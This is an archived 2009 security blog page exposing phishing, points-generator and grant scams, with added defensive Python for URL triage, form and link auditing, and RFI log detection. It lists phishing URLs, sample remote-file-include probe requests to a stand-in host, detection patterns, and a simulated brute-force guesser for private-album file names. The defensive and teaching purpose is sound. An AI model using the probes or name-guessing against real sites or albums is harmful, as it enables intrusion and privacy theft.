Christopher Boyd: January 2009 Archives

How Old?

This XBox Live phish attempt caught my eye:

flu0.gif

It's a lot better looking than many of the others I see, and the phisher took the time to make a fake screenshot to impress you with all the fake money he (doesn't) have. The most interesting thing about it for me is that it references another domain ("Runeflux.com"). Usually they're pretty anonymous.

Anyway, I decided to check out the domain - there's nothing there, could it have been taken down? Well, a quick search later and we have this (rather well edited) Youtube video. Apparently the domain simply hosted the same phishing page, so yes - it's a fair bet someone had it taken offline.

The important part is when you check out the profile of the person who owns the account:


flu3.gif

Yes, our phishing friend is only 14. I've had quite a bit of experience researching people at the younger end of the age spectrum involved in this sort of thing, and I have to say the basic mechanics of "how to phish" are all in place with this kid.....slick websites, Youtube promotion, little touches like fake screenshots....it's all there.

Worrying, isn't it?

Anyway, the URL to avoid here is

h1.ripway.com/microsoftpointsgen/

There seem to be quite a few sites online at present claiming they can give you "online tax refunds", if only you fill in your bank details and click "submit". It's not a good idea, and they look pretty convincing:


irs1.gif

irs2.gif

Some of these domains have been up and down since last night, but I expect some of them will return again so here they are in full:

gicrisis.org/data/refundtax/SearchTAXERR.php

irs-2009.com/refund/refunds.html

collectrefund-irs.com/refund/refunds.html

cimaonline.ca/application/Internal/Revenue/Service/pas.php?certegy_vm=trueportlet_change_1_actionOverrideFchaseonlineFchangeFprocessDetails_windowLabel_portlet_process_pageLabel_page_process

jklabs.cz/phpayv2/admin/import/.secure/www.irs.gov/get-refund/refunds.php?Where_is_my_refund&Get_Refund
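A quick way to see at a glance why none of the addresses above is irs.gov, even the one with "www.irs.gov" buried in its path: the Python below is an added example written for this page, not code from the post or from any of the sites named in it. The legitimate-host set and the brand strings it looks for are my assumptions, and the "http://" scheme is added because the post lists the URLs without one.

```python
from urllib.parse import urlsplit
import re

# URLs copied from the post above. The "http://" scheme is an assumption:
# the post lists them without one.
PHISH_URLS = [
    "http://gicrisis.org/data/refundtax/SearchTAXERR.php",
    "http://irs-2009.com/refund/refunds.html",
    "http://collectrefund-irs.com/refund/refunds.html",
    "http://cimaonline.ca/application/Internal/Revenue/Service/pas.php?certegy_vm=true",
    "http://jklabs.cz/phpayv2/admin/import/.secure/www.irs.gov/get-refund/refunds.php?Where_is_my_refund&Get_Refund",
]

# The one host a US tax refund page could legitimately live on (assumption).
LEGIT_HOSTS = {"irs.gov"}
# Brand words that are suspicious as a whole label (or hyphen-separated part
# of a label) in somebody else's hostname.
HOST_BRAND_LABELS = {"irs"}
# Strings that are suspicious anywhere in the path or query of a non-IRS host.
PATH_BRAND_STRINGS = ("irs.gov", "internal/revenue/service", "refund", "tax")


def registrable_domain(host):
    """Last two labels of the host. Deliberately naive: real code should use a
    public suffix list so that e.g. 'bank.co.uk' is not cut down to 'co.uk'."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def triage(url):
    """Return the reasons the URL looks like an IRS lookalike; an empty list
    means the host really is the legitimate domain or nothing brand-like is
    being borrowed."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    if reg in LEGIT_HOSTS:
        return []  # whatever the path says, the request goes to the real site

    reasons = []
    for legit in LEGIT_HOSTS:
        # www.irs.gov.example.com: the real name used as a subdomain of the phish host
        if re.search(r"(^|\.)" + re.escape(legit) + r"(\.|$)", host):
            reasons.append(f"legitimate name {legit!r} embedded in host {host}")
    for label in re.split(r"[.-]", host):
        if label in HOST_BRAND_LABELS:
            reasons.append(f"brand label {label!r} in host {host}")
    # Only the host decides where the request goes; the path is free text.
    path_and_query = (parts.path + "?" + parts.query).lower()
    for needle in PATH_BRAND_STRINGS:
        if needle in path_and_query:
            reasons.append(f"path/query mentions {needle!r} but host is {host}")
    return reasons


def suspicious(url):
    return bool(triage(url))


if __name__ == "__main__":
    for u in PHISH_URLS:
        print(u)
        for reason in triage(u):
            print("   ", reason)
```

The jklabs.cz entry is the one worth internalising: the only part of a URL that decides where the request goes is the host, and everything after the first single "/" is a path the phisher can name however they like. The last-two-labels domain split is deliberately naive; anything beyond a demo should use a public suffix list.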

A Nice Fixer-Upper

Check out this awesome blog post on the Malware Diaries blog, where a rogue antivirus maker is trying to keep up with the Joneses where their fancy company building is concerned.

They've managed to fail spectacularly...

Timed To Perfection

I just had to share this with you, one of the stranger things I've found recently.

hs1.png

Yes, that says what you think it says. Presumably someone wanted to time themselves cracking into servers and defacing webpages.

Observe:

hs2.png

And in action:

hs3.png

We wait with bated breath for Version 2...
....not really.

fhc1.png

The above is an absolutely hideous phish. Someone clearly needs to hire a real designer with all that stolen Habbo money they must have by now. I think the "Free Habbo Credits" thing was supposed to be clickable (hence the "Proof!" bit), but they seem to have messed that up.

Doh.

The URL to avoid here is

habmanny.tripod.com/id7.html

Fusking. You might have heard the term before, but what is it?

From Wikipedia:

"A Fusker is a type of website or utility that extracts images from a web page, typically from free hosted galleries. Fusker software allows users to identify a sequence of images with a single pattern, for example:

example.com/images/pic[1-16].jpg

This would identify images pic1.jpg, pic2.jpg, through pic16.jpg.

When this pattern is given to a fusker website, the website would produce a page that displays all sixteen images in that range."


In other words, it's the same as visiting a website, assuming the images are numbered sequentially (1.jpg, 2.jpg, 3.jpg...) then manually changing the last part of the URL to cycle through them all. Fuskers do the same thing, but on a potentially much bigger scale.

Well, a few days ago I came across something called "Photof*cket" (this is a worksafe blog, hence the blanking out)...designed to grab images from Photobucket (you can see what they did there). It seems to have been around for quite some time, but I must admit it's the first I've seen of it.

pf.png

pf2.png

pf3.png

From the Documentation:

"The core functionality of PhotoF*cket is to download content from public and private PhotoBucket albums.

Main Features

Rip Public Albums - PhotoF*cket can download all the content from a public album quickly and easily.

Rip Private Albums (with password) - If you have the password to a private account, PhotoF*cket can download all the content from the album just as quickly and easily as if it were a public album.

Fusk Private Albums (without password) - PhotoF*cket can attempt to download the content of a private album using a brute-force method called "fusking," where the software tries to download content by guessing the names of files that might be in the private album."


That last part is particularly interesting - and like I said in the title, simply leaving your pictures as "img1 / picture1 / img_1" etc before uploading them to your "Private" galleries is probably a bad idea. Fuskers will go looking for the most common naming schemes - giving your images custom titles makes it that little bit harder for people to grab them. Of course, my own thought on this is that if your image is personal enough that you have to put it in a private gallery at all, then you likely shouldn't be putting it online in the first place.
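To make the two quoted descriptions concrete, here is an added example (my own code, not PhotoF*cket or any fusker site) that does both jobs offline: it expands a fusker pattern like the one in the Wikipedia quote, and it simulates a brute-force fusk of a private album by generating the kind of file names such tools guess. The naming schemes and the sample album are my assumptions; the post does not reproduce the tool's actual list.

```python
import re

# Token syntax handled: [1-16] numeric range (zero padding is kept when the
# low bound has it, e.g. [01-16]) and {a,b,c} alternatives.
TOKEN_RE = re.compile(r"\[(\d+)-(\d+)\]|\{([^{}]*)\}")


def _token_values(match):
    if match.group(1) is not None:
        lo, hi = match.group(1), match.group(2)
        width = len(lo) if lo.startswith("0") else 0
        return [str(n).zfill(width) for n in range(int(lo), int(hi) + 1)]
    return match.group(3).split(",")


def expand(pattern):
    """Expand a fusker pattern into the concrete URLs it denotes."""
    match = TOKEN_RE.search(pattern)
    if match is None:
        return [pattern]
    head, tail = pattern[:match.start()], pattern[match.end():]
    return [head + value + rest
            for value in _token_values(match)
            for rest in expand(tail)]


# Naming schemes a fusker would try against a private album. This list is an
# assumption about what "the most common naming schemes" means; the post does
# not give the tool's real list.
NAME_SCHEMES = ("img{n}", "img_{n}", "img_{n:04d}", "image{n}", "picture{n}",
                "pic{n}", "photo{n}", "dsc{n:05d}", "dscn{n:04d}")
EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")


def guess_names(max_n):
    """Candidate basenames a brute-force fusk would request, lower-cased."""
    for n in range(1, max_n + 1):
        for scheme in NAME_SCHEMES:
            for ext in EXTENSIONS:
                yield scheme.format(n=n) + ext


def fusk(album_files, max_n=100):
    """Simulate a fusk offline: which files of a private album would be found
    purely by guessing? album_files stands in for the server's answers (a real
    tool would send one HTTP request per guess), so nothing is fetched."""
    present = {name.lower(): name for name in album_files}
    found = {present[guess] for guess in guess_names(max_n) if guess in present}
    return sorted(found)


# Constructed example album, not a real account.
PRIVATE_ALBUM = ["img1.jpg", "IMG_0042.JPG", "picture3.png",
                 "holiday_beach_tom.jpg", "DSC00017.JPG"]

if __name__ == "__main__":
    print(expand("example.com/images/pic[1-16].jpg")[:3], "...")
    print(fusk(PRIVATE_ALBUM))
```

Running it shows why renaming matters: every file in the constructed album that kept its camera or upload default is found without a password, and the only one that survives is the one with a custom name. It also shows why fusking is noisy from the hosting side: a real tool replaces the set lookup with a request per guess, which means thousands of 404s for names that do not exist.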

You never know who is poking around - or (more importantly) how they're doing it...

This tale starts with a random (and entirely unrelated) advert placed on a forum:

pg1.jpg

As you probably guessed already, their "Mom" in "Tamworth" doesn't actually exist. Click the ad, and...

pg2.jpg

You're dropped into a game of multiple choice, except it's rigged in your favour. Regardless of which door you select, you'll see this:

pg3.jpg

Seriously, I picked the "winner" eleven times out of eleven. If I was that good, I'd be in Vegas, not playing "guess the right door to win an iPhone".

Let's see: a fake, unrelated advert to get you here, and a rigged game that removes the possibility of losing (they can't make money if you lose, right?). I'm loving the site so far. Anyone signing up to stand a chance of winning had better love spending lots of money on phone bills too - check out the price of this particular service:

"This is a subscription service, it will cost £10 ($13) per week (plus £5 set up fee), max 4 items per week, until you send STOP to 85115."


Ouch.

Of course, you could save the money you'd be about to waste on random phone lotteries and save up to buy one instead, but that would be just too sensible...

There are many Microsoft XBox Live scams out there - many involve increasingly sophisticated "fake points generators" (which claim to produce "free" Microsoft points used to purchase downloads and other items, only to steal your login details).

However, some are so amazingly breathtaking with regard to what they ask the end-user to do, it's somewhat miraculous anybody would actually fall for them.

This is one such scam, currently doing the rounds on Youtube. Our video begins:

dup1.jpg

...wait, how to duplicate the Microsoft points you already paid for? Wow. That's going to be pretty impressive. First though, we need to throw in some cod-technical speak to confuse the masses and make this seem more legit:

dup2.jpg

Yep, that'll do it. Poor old "Microsoft generator", whatever that is. It goes on:

"To do this, you'll need the following items..."


dup3.jpg

Must be an "unused card" (in other words, one that you've already purchased), eh? I wonder why. Let's see where this goes....

dup4.jpg

...EMail? They're not going to ask people to do what I think they're going to ask them to do, are they?

dup5.jpg

...whoops, they are. In a nutshell, you run out, buy your Microsoft points, then EMail a random stranger your (unused) code, along with some more cod-technical nonsense in the body of the mail that supposedly makes this "generator" create a duplicate of your unused code. You then presumably skip into the Sunset, armed with twice the points you started out with and go on a massive spending spree.

The alternate theory would be that you buy a code, then EMail it to a random stranger and they simply use it for free, at your own expense, leaving you with nothing.

Surely not...!

Here's an interesting website:

Obamastimulusprogram.com

Registered anonymously, the splashpage is particularly slick looking:

ob1.gif

"Immediate Action To Help You

Tax cuts are one means of providing economic relief to those in need and will be part of the recovery plan for America. However, Government Grants will also play a vital role as a means to swiftly provide assistance to those who could use financial assistance. Unlike a loan these Government Grants provide funds which do not need to be repaid and can be used for virtually any purpose including:

    * pay off many forms of debt
    * consolidate debt
    * provide mortgage assistance or prevent foreclosure
    * purchase a new home
    * start a new business or assist with an existing business
    * pay off student loans or assist new students with obtaining a degree

If there is a bill out there that needs to be paid there is most likely funding now available that will be able to cover it."


Scroll down, and you're told that "Demand is expected to be very high for these programs, so although billions have been set aside, unfortunately the funds will only last for a limited period of time."

The only thing left to do is hit the big red "Request free Government funds" button, and see....

ob3.gif

...an iPhone offer, which is the first indication the Obama Stimulus site isn't "official" but rather the product of an ad network. Sure enough, change your system settings to make them think you're in an area eligible for the offer and...

ob5.jpg

You see yet another slick looking page entitled "Grant Danger" (with logos from CNN, CBS, Fox and Yahoo! at the top to make the site look more official - while Obama's stimulus program itself has been in the news, I doubt this website has), and beneath that, lots of pictures of people smiling in front of their grant-paid homes, grant-paid credit card debts and some guy who was given $175,000 to "invent a machine to glue fabric together" (never heard of Copydex? Oh well).

Also, note the entirely false "countdown timer" that only gives you ten minutes to fill in the form. Quick! Before it reaches zero, and....absolutely nothing happens.

Well, there's a surprise.

What they want you to do is send them $2.95 shipping & handling, for which they'll send you some "information" on how to obtain said Government loans. Now, I'm not massively up on American Government Loans, but if I really wanted one, couldn't I just contact a Government Loans Department for free rather than giving $2.95 to some random people on the Net without even knowing what I'm paying for upfront?

A tidy profit could be made in this area, especially with the whole "credit crunch / we're all doomed" scenario playing out at the moment. Throw in a useless countdown timer, splash phrases like "Grant Danger" and "millions in free grants will be lost" all over the place and you're probably onto a winner.

Oh, might want to check those T&Cs before you send off for this "offer".

Furthermore, any free trials that may or may not be offered with this product are only free during the said allotted time of the free trial period as outlined within the product sales page, confirmation of order page, and confirmation email. If you have not cancelled the free bonus within the 7 day trial period (if offered on product purchasing), you are agreeing to purchase the bonus material and/or service at a monthly reoccurring cost. The resource center is billed at $58.61 monthly.

Is that applicable here? I've no idea, but I don't intend to find out by trying to grab me some "free" money. I'm fine with my useless "free iPod" offers, thanks...

Yahoo! Games "Fun"...

There seem to be quite a few phishes doing the rounds for Yahoo! Games All-Star Central at the moment.

yphish.gif

hotpicts.idoo.com

Would appear to fit the bill nicely. A colleague tells me there were many of these live yesterday, but most are now offline. As always, be careful with your logins...

Not much content to the linked article, but somewhat disturbing anyway.

If you go hunting for free Batman games (probably not a good idea given what happened last time), then you'll see something like this in Google search results:

freebatmangame.jpg


If you click the second link, which is

free-downloadable.ilona.biz.st/free-batman-game.html

...you'll immediately be redirected to a rogue antispyware scanner, in this case to Antivirus 2009.

av20091.jpg

I particularly liked the message in the box near the bottom of the screen while the fake scan is running:

treats.jpg

No, anything but that!

We've heard reports of a couple of these websites currently doing the rounds - they call themselves "Microsoft Points Heaven", and usually sit on free hosting domains. They promise you "free" Microsoft points, then ask you to enter your Live login details. At that point, your data has been stolen.

mph1.jpg

If you check the code, you can see you're not "signing in to XBox Live" at all - you're entering your information into a standard submission form, which will send the information you enter directly to the site owner.

wfrm.jpg

The last URL we saw this scam residing at was

microsoftpointheaven.weebly.com

which is now offline. It will no doubt resurface somewhere else, so be on your guard...

I love bizarre fake warning messages.

This one is a little stranger than most, however:

unsoiled.jpg

We're seeing quite a lot of these at the moment:

fakecnn1.jpg

The Emails are fake - click the link, and you'll be taken to a website that does pretty much the same thing as these sites from August.

Avoid.

A clever tactic used by spammers to get you to click their links: send an official looking email saying you "unsubscribed" from various services. If enough of them are sent out, eventually they're going to reach someone who immediately wonders how they managed to unsubscribe from their favourite website / newsletter / whatever.

fakeunsub1.jpg

In this case, hovering over the "Unsubscribe" hyperlink shows that it'll actually send you to

radiovary.com

Which is a fairly typical Viagra website:

viag1.jpg

As always, be suspicious of random "Unsubscribe" messages sent via EMail. If in doubt, hover over the links and check the address it leads to at the bottom. If you're still unsure, just ignore the email and go directly to the website in question. The site here is fairly harmless, but the same technique could easily be applied to email address harvesting and sending you to infection sites.
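Both of the checks suggested in this post and in the Microsoft Points Heaven post above ("check the code" of a login form, "hover over the links") can be done mechanically. The Python below is an added example, not code from the post: it pulls every form action and every link out of a page and reports forms that submit to a domain other than the one the page claims to be, and links whose visible text names a domain that is not where the href actually goes. The three HTML snippets are constructed stand-ins for the phish form, the fake unsubscribe mail and a genuine sign-in page, and the host names in them (login.live.com, example-newsletter.com) are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Something that looks like a domain name inside visible link text.
DOMAIN_IN_TEXT = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})\b", re.I)


def registrable_domain(host):
    # Naive last-two-labels split; use a public suffix list in real code.
    return ".".join(host.lower().strip(".").split(".")[-2:])


class FormsAndLinks(HTMLParser):
    """Collect every <form action> and every <a href> with its visible text."""

    def __init__(self):
        super().__init__()
        self.forms, self.links = [], []
        self._link = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))
        elif tag == "a":
            self._link = [a.get("href") or "", ""]

    def handle_data(self, data):
        if self._link is not None:
            self._link[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._link is not None:
            self.links.append((self._link[0], " ".join(self._link[1].split())))
            self._link = None


def audit(page_url, html, expected_domain):
    """Human-readable findings: forms that submit somewhere other than
    expected_domain, and links whose text names a domain the href does not
    lead to. page_url resolves relative actions/hrefs; pass "" for a mail."""
    parser = FormsAndLinks()
    parser.feed(html)
    findings = []
    for action, method in parser.forms:
        host = urlsplit(urljoin(page_url, action)).hostname or ""
        if registrable_domain(host) != expected_domain:
            findings.append(f"form ({method}) submits to {host or '?'}, not {expected_domain}")
    for href, text in parser.links:
        href_host = urlsplit(urljoin(page_url, href)).hostname or ""
        for shown in DOMAIN_IN_TEXT.findall(text):
            if registrable_domain(shown) != registrable_domain(href_host):
                findings.append(f"link text says {shown!r} but goes to {href_host}")
    return findings


# Constructed samples, not the real page or mail shown in the posts.
PHISH_FORM = """
<html><body><h1>Xbox LIVE - Sign in</h1>
<form method="post" action="collect.php">
  <input name="email"><input name="password" type="password">
  <input type="submit" value="Sign in">
</form></body></html>
"""
UNSUB_MAIL = """
<p>You have been unsubscribed from example-newsletter.com.</p>
<p><a href="http://radiovary.com/u?id=1">Resubscribe at example-newsletter.com</a></p>
"""
LEGIT_PAGE = """
<form method="post" action="https://login.live.com/post">
  <input name="login"><input name="passwd" type="password">
</form>
<a href="https://login.live.com/help">Need help?</a>
"""

if __name__ == "__main__":
    print(audit("http://microsoftpointheaven.weebly.com/", PHISH_FORM, "live.com"))
    print(audit("", UNSUB_MAIL, "example-newsletter.com"))
    print(audit("https://login.live.com/", LEGIT_PAGE, "live.com"))
```

The form check is the important one for the points-generator phishes: a page can copy the Xbox Live sign-in pixel for pixel, but the action attribute still has to name a host the phisher controls, and a relative action like "collect.php" resolves to the free-hosting domain the page sits on.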


Wow, this is creepy.

It's an EBay phish page that does two things.

fakeebay1.jpg

The first is that it bizarrely asks you to install a Firefox extension called QIP (as you can see from the yellow bar across the top in the above screenshot), which (as far as I'm aware) is a legitimate Russian extension that allows you to converse with friends across multiple platforms.

fakeebay2.jpg

Call me crazy, but I'm sure most EBay users would immediately think something was wrong if they were presented with a Russian Firefox extension on EBay.

Worse is to come, however. If the end-user should scroll down a little, they're presented with adverts - and they don't exactly convince you that this is the real EBay website. One usually contains a naked woman of some sort. The other? Well, it tends to show a close up of a randomly selected dead woman's face, often horribly mutilated.

Yes, I have no idea what's going on here either.

ebayfake3.jpg

 
ebayfake4.jpg

Now I've seen a lot of strange things on EBay. Fake laptops, XBox scams, cash on delivery con-jobs and hacktool packs. However, naked women and dead bodies probably takes first prize (at least it would if this was the real site). Thanks for freaking me out, insane Russian phisher.

In case you're wondering, the adverts all seem to take you to some kind of Russian linkdump, where none of the images relate to the site you're going to end up at. Russian Roulette is indeed the name of the game where that's concerned.

The site to avoid like the plague here is

sadww.sadas.nm.ru/abasdass.htm

The Devilz Return...

The Turkish hacking group NetDevilz have hit the headlines on a number of occasions, most notably last year when they went on a bit of a Photobucket rampage. Well, they're apparently back with a collection of hacking tools. The most interesting is this RFI (remote file inclusion) scanner:

rfi1.jpg

As you've probably already guessed, it hunts for vulnerable websites to exploit. There's also an SQL Scanner, which looks identical:

rf2.jpg

Just to make things more interesting, we've heard some reports that people attempting to use these tools are complaining that they've been Trojaned by a rash of backdoored versions. We saw no evidence of booby traps in either file, but it's entirely possible someone decided to have a little "fun" and own some PCs in the rush to use both of these programs...

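What an RFI scanner like this leaves behind in the logs of the sites it probes is easy to spot, and it is the side of the tool a site owner can actually do something about. The Python below is an added example, not code from the post or from the NetDevilz tools: it parses combined-format access log lines, picks out requests where a query parameter carries a full remote URL (the classic `?page=http://host/shell.txt?` include probe), and then only reports clients that sprayed such URLs across several different scripts, because a single one can be a user pasting a link into a search box. The log lines are constructed samples using documentation IP addresses.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Combined log format: client ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample log (RFC 5737 documentation addresses), not a real capture.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jan/2009:03:12:01 +0000] "GET /index.php?page=http://198.51.100.9/id.txt?? HTTP/1.1" 200 4821 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Jan/2009:03:12:01 +0000] "GET /modules.php?name=News&file=http://198.51.100.9/id.txt? HTTP/1.1" 404 312 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Jan/2009:03:12:02 +0000] "GET /includes/header.php?inc=http://198.51.100.9/id.txt? HTTP/1.1" 404 312 "-" "Mozilla/4.0"
192.0.2.44 - - [21/Jan/2009:03:15:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 5110 "-" "Mozilla/5.0"
192.0.2.44 - - [21/Jan/2009:03:16:02 +0000] "GET /search.php?q=http://example.com HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
"""


def rfi_candidates(log_text):
    """Yield (client, script, parameter, remote_url) for every request whose
    query string carries a full remote URL as a parameter value."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, _time, _method, target, _status = m.groups()
        script, _, query = target.partition("?")
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if REMOTE_URL.match(value):
                    yield client, script, param, value


def rfi_scanners(log_text, min_scripts=2):
    """Clients that pushed a remote URL into at least min_scripts different
    scripts. One URL in one parameter can be a user pasting a link; the same
    include file sprayed across many scripts is a scanner."""
    by_client = defaultdict(list)
    for client, script, param, url in rfi_candidates(log_text):
        by_client[client].append((script, param, url))
    return {client: hits for client, hits in by_client.items()
            if len({script for script, _, _ in hits}) >= min_scripts}


if __name__ == "__main__":
    for client, hits in rfi_scanners(SAMPLE_LOG).items():
        print(client)
        for script, param, url in hits:
            print(f"   {script}?{param}={url}")
```

In the sample, 203.0.113.5 hits three different scripts with the same remote file and gets reported, while 192.0.2.44, whose only remote URL went into a search box, does not. The trailing "?" on the probe URLs is the usual trick of turning whatever the vulnerable script appends to the include path into a query string on the attacker's server.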
Okay, I tried repeatedly to get the site back up and running after it fell to pieces just before Christmas. Unfortunately, I've since discovered that the domain mapping being used to keep the site working was an awful lot more unstable than it had any right to be.

I woke up yesterday to find the site AWOL, and everything behind the scenes was a mess.....again.....for the third time. It seems crazy to keep impacting on my writing duties here by grappling with a website that (for the time being) refuses to play nice, so for now, this is sadly the end of my attempts to bring the site back. It's not fair on readers to be constantly told the "site is back", only to watch it go horribly wrong five minutes later.

It's not a massive problem - it just means the sum total of posts that would have been spread across two sites will now just be on this one site.

Still.....argh.

Spam Wave On SPG

Well, it took a while but we're finally getting to grips with the insane amounts of spam from "Bruno" and "Ricky Martin". If there's any left over, it should be gone shortly.

I don't even like his songs...

(Automatically translated from Italian):

hhack1.jpg

...sadly, as crude as it is, you'd be surprised how many people will fall for the old "Send your login to a random Hotmail address" gag. The domain to avoid is

habbohack2.blogspot.com

We came across this tool while researching some gaming hacks:

rs.jpg

This is designed to fool users into thinking they can hack the game in question (in this case, Runescape). Of course, the victim doesn't know that the file will have been bound to a keylogger or other malicious program. Depending on the infection file selected, the end-user could have a very bad day...

Twitter Phish Attacks

There seems to have been an outbreak of phish links dropped onto Twitter in the last day or so.

Messages such as these should be avoided:

hey look at this funny blog rosalierebyb.blogspot.com/

heyy!!! i want u to see my blog!! blogtwitter.access-logins/login


You'll notice the second message (which was sent to a colleague of mine) incorrectly lists the phishpage (it's missing the .com, so the phishers shot themselves in the foot with that one) but the page at

blogtwitter.access-logins.com/login/

is still live at time of writing. More here.

About this Archive

This page is an archive of recent entries written by Christopher Boyd in January 2009.

Christopher Boyd: December 2008 is the previous archive.

Christopher Boyd: February 2009 is the next archive.

Find recent content on the main index or look in the archives to find all content.